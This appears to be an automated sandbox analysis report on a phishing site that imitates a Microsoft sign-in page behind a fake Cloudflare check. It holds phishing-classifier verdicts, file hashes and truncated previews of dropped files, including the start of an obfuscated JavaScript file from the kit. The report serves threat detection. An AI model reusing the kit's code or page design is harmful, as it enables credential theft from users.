                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://sanbernardinoscounty.telcom-info.com/
                                                                          No simulations
                                                                          InputOutput
                                                                          URL: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8 Model: jbxai
                                                                          {
                                                                          "brand":["Microsoft"],
                                                                          "contains_trigger_text":true,
                                                                          "trigger_text":"Create one!",
                                                                          "prominent_button_name":"Next",
                                                                          "text_input_field_labels":["Email or phone",
                                                                          "No account?",
                                                                          "Can't access your account?",
                                                                          "Terms of use Privacy & cookies"],
                                                                          "pdf_icon_visible":false,
                                                                          "has_visible_captcha":false,
                                                                          "has_urgent_text":false,
                                                                          "has_visible_qrcode":false}
                                                                          URL: https://sanbernardinoscounty.telcom-info.com/ Model: jbxai
                                                                          {
                                                                          "brand":["Microsoft",
                                                                          "Cloudflare"],
                                                                          "contains_trigger_text":true,
                                                                          "trigger_text":"Verifying... CLOUD FLARE Privacy. Terms",
                                                                          "prominent_button_name":"unknown",
                                                                          "text_input_field_labels":"unknown",
                                                                          "pdf_icon_visible":false,
                                                                          "has_visible_captcha":false,
                                                                          "has_urgent_text":false,
                                                                          "has_visible_qrcode":false}
                                                                          URL: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8 Model: jbxai
                                                                          {
                                                                          "phishing_score":9,
                                                                          "brands":"Microsoft",
                                                                          "legit_domain":"microsoft.com",
                                                                          "classification":"wellknown",
                                                                          "reasons":["The brand 'Microsoft' is well-known and its legitimate domain is 'microsoft.com'.",
                                                                          "The provided URL 'sanbernardinoscounty.telcom-info.com' does not match the legitimate domain 'microsoft.com'.",
                                                                          "The URL contains extra words and hyphens which are common indicators of phishing.",
                                                                          "The domain 'telcom-info.com' is not associated with Microsoft.",
                                                                          "The subdomain 'sanbernardinoscounty' is unrelated to Microsoft and adds to the suspicion."],
                                                                          "brand_matches":[false],
                                                                          "url_match":false,
                                                                          "brand_input":"Microsoft",
                                                                          "input_fields":"Email or phone,
                                                                           No account?,
                                                                           Can't access your account?,
                                                                           Terms of use Privacy & cookies"}
                                                                          URL: https://sanbernardinoscounty.telcom-info.com/ Model: jbxai
                                                                          {
                                                                          "brand":["Microsoft"],
                                                                          "contains_trigger_text":true,
                                                                          "trigger_text":"Verifying... CLOUD FLARE Privacy\\u00b7 Terms",
                                                                          "prominent_button_name":"unknown",
                                                                          "text_input_field_labels":"unknown",
                                                                          "pdf_icon_visible":false,
                                                                          "has_visible_captcha":false,
                                                                          "has_urgent_text":false,
                                                                          "has_visible_qrcode":false}
                                                                          URL: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8# Model: jbxai
                                                                          {
                                                                          "brand":["Microsoft"],
                                                                          "contains_trigger_text":true,
                                                                          "trigger_text":"Sign in Enter a valid email address,
                                                                           phone number,
                                                                           or Skype name Email or phone No account? Create one!",
                                                                          "prominent_button_name":"Next",
                                                                          "text_input_field_labels":["Email or phone"],
                                                                          "pdf_icon_visible":false,
                                                                          "has_visible_captcha":false,
                                                                          "has_urgent_text":false,
                                                                          "has_visible_qrcode":false}
                                                                          URL: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8# Model: jbxai
                                                                          {
                                                                          "phishing_score":9,
                                                                          "brands":"Microsoft",
                                                                          "legit_domain":"microsoft.com",
                                                                          "classification":"wellknown",
                                                                          "reasons":["The legitimate domain for Microsoft is microsoft.com.",
                                                                          "The provided URL (sanbernardinoscounty.telcom-info.com) does not match the legitimate domain.",
                                                                          "The URL contains extra words and hyphens which are common indicators of phishing.",
                                                                          "The domain 'telcom-info.com' is not associated with Microsoft.",
                                                                          "The subdomain 'sanbernardinoscounty' is unrelated to Microsoft and adds to the suspicion."],
                                                                          "brand_matches":[false],
                                                                          "url_match":false,
                                                                          "brand_input":"Microsoft",
                                                                          "input_fields":"Email or phone"}
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (6645), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):6645
                                                                          Entropy (8bit):5.323156326570097
                                                                          Encrypted:false
                                                                          SSDEEP:192:2gSUlKzG+HNgGGZz6e+jDtH8jBpfFtr2BrAecTO:2dUozhtbkzH+jDtKpNwBFcq
                                                                          MD5:AD9F46DD1FB91B96EFB4A31DE1D50F77
                                                                          SHA1:03CA511BB1457FC368403B369EDA88F69D5A1558
                                                                          SHA-256:FB231833B3DA52E6925BD85EF97156B8DA3500AEE026D5FAC97BBA193A12A734
                                                                          SHA-512:F6284891F0244B6BAD61515EECB47EB5FD7529BBDFAE599E860E0325C24F78B76C8285F62A3DA65A678E493E7EB81F93B5E4E32770B165DD32583A4881F59819
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:const a0_0x826a2b=a0_0x1c3b;(function(_0x5c54e3,_0x3ae404){const _0x2b59cc=a0_0x1c3b,_0x11c240=_0x5c54e3();while(!![]){try{const _0x1d2224=parseInt(_0x2b59cc(0x115))/0x1+-parseInt(_0x2b59cc(0x113))/0x2+-parseInt(_0x2b59cc(0x12b))/0x3+-parseInt(_0x2b59cc(0x11c))/0x4+-parseInt(_0x2b59cc(0x128))/0x5+parseInt(_0x2b59cc(0x118))/0x6*(parseInt(_0x2b59cc(0x112))/0x7)+parseInt(_0x2b59cc(0x102))/0x8;if(_0x1d2224===_0x3ae404)break;else _0x11c240['push'](_0x11c240['shift']());}catch(_0x1737bc){_0x11c240['push'](_0x11c240['shift']());}}}(a0_0xddb9,0xbd844));const a0_0x5402c7=(function(){let _0x180fa5=!![];return function(_0x1e2174,_0x3b73d2){const _0x5641e0=_0x180fa5?function(){if(_0x3b73d2){const _0x1448ec=_0x3b73d2['apply'](_0x1e2174,arguments);return _0x3b73d2=null,_0x1448ec;}}:function(){};return _0x180fa5=![],_0x5641e0;};}()),a0_0x2f9e2a=a0_0x5402c7(this,function(){const _0x2d54d8=a0_0x1c3b;return a0_0x2f9e2a[_0x2d54d8(0x117)]()[_0x2d54d8(0x114)]('(((.+)+)+)+$')[_0x2d54d8(0x117)]()[_0x2d54d8(0
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):16
                                                                          Entropy (8bit):3.875
                                                                          Encrypted:false
                                                                          SSDEEP:3:HtHKiY:RKiY
                                                                          MD5:011B17B116126E6E0C4A9B0DE9145805
                                                                          SHA1:DF63A6EB731FFCE96F79802EFF6D53D00CDA42BC
                                                                          SHA-256:3418E6E704387A99F1611EB7BB883328A438BA600971E6D692E8BEA60F10B179
                                                                          SHA-512:BB432E96AF588E0B19CBD8BC228C87989FE578167FD1F3831C7E50D2D86DE11016FB93679FEF189B39085E9151EB9A6EB2986155C65DD0FE95EC85454D32AE7D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAn73xgIzs9t7hIFDdFbUVI=?alt=proto
                                                                          Preview:CgkKBw3RW1FSGgA=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (32065)
                                                                          Category:dropped
                                                                          Size (bytes):85578
                                                                          Entropy (8bit):5.366055229017455
                                                                          Encrypted:false
                                                                          SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):3651
                                                                          Entropy (8bit):4.094801914706141
                                                                          Encrypted:false
                                                                          SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                          MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                          SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                          SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                          SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):61
                                                                          Entropy (8bit):3.990210155325004
                                                                          Encrypted:false
                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (3379)
                                                                          Category:downloaded
                                                                          Size (bytes):4210
                                                                          Entropy (8bit):5.364580472613482
                                                                          Encrypted:false
                                                                          SSDEEP:48:sc+17gESlBdSqCavuSpDk5vXHgomMNZs7ulIWfcSOCOyY4XCFoLpp:XSEd916APuZsdC5Np
                                                                          MD5:59087D72EEDCB7650C9D5D6088440DD3
                                                                          SHA1:97B607FCE11F640E5764699038E50A76EB98944B
                                                                          SHA-256:E0E3FB0FE5CA541950CF8DD213FBE9E8957A3DB0010B515AD01ADFF6CA908A3E
                                                                          SHA-512:4F213391C01CFB017AB290007F3C7E66DB9B2A7A1EA4B4843DD52B0D7E5B1A5C04896BF1856806964F5A49C38A66403A8CDFE2C8C3EAF82C8318012F444DCD3F
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/captcha/style.css
                                                                          Preview:@font-face{font-family:FabricMDL2Icons;src:url('//res.cdn.office.net/owamail/20240308003.09/resources/fonts/o365icons-mdl2.woff') format('woff');font-weight:400;font-style:normal}@font-face{font-family:office365icons;src:url('//res.cdn.office.net/owamail/20240308003.09/resources/fonts/office365icons.woff?') format('woff');font-weight:400;font-style:normal}#loadingScreen{position:fixed;top:0;bottom:0;left:0;right:0;background-color:#fff}#loadingLogo{position:fixed;top:calc(50vh - 90px);left:calc(50vw - 90px);width:180px;height:180px}#MSLogo{position:fixed;bottom:36px;left:calc(50vw - 50px)}.dark #loadingScreen{background-color:#333}.darkNew #loadingScreen{background-color:#1f1f1f}.:root{--s:180px;--envW:130px;--envH:71px;--calW:118px;--sqW:calc(var(--calW) / 3);--sqH:37px;--calHH:20px;--calH:calc(var(--sqH) * 3 + var(--calHH));--calY:calc(var(--calH) + 20px);--calYExt:calc(var(--calH) - 80px);--calYOverExt:calc(var(--calH) - 92px);--flapS:96px;--flapH:calc(0.55 * var(--envH));--flapScal
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):3651
                                                                          Entropy (8bit):4.094801914706141
                                                                          Encrypted:false
                                                                          SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                                          MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                          SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                          SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                          SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/logo_/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b03449ef
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65447)
                                                                          Category:dropped
                                                                          Size (bytes):89501
                                                                          Entropy (8bit):5.289893677458563
                                                                          Encrypted:false
                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):315
                                                                          Entropy (8bit):5.0572271090563765
                                                                          Encrypted:false
                                                                          SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                          MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                          SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                          SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                          SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/favicon.ico
                                                                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47261)
                                                                          Category:downloaded
                                                                          Size (bytes):47262
                                                                          Entropy (8bit):5.3974731018213795
                                                                          Encrypted:false
                                                                          SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                          MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                          SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                          SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                          SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js
                                                                          Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):1592
                                                                          Entropy (8bit):4.205005284721148
                                                                          Encrypted:false
                                                                          SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                                          MD5:4E48046CE74F4B89D45037C90576BFAC
                                                                          SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                                          SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                                          SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://sanbernardinoscounty.telcom-info.com/sig/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b0344ab6
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                          Category:dropped
                                                                          Size (bytes):17174
                                                                          Entropy (8bit):2.9129715116732746
                                                                          Encrypted:false
                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47261)
                                                                          Category:dropped
                                                                          Size (bytes):47262
                                                                          Entropy (8bit):5.3974731018213795
                                                                          Encrypted:false
                                                                          SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                          MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                          SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                          SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                          SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
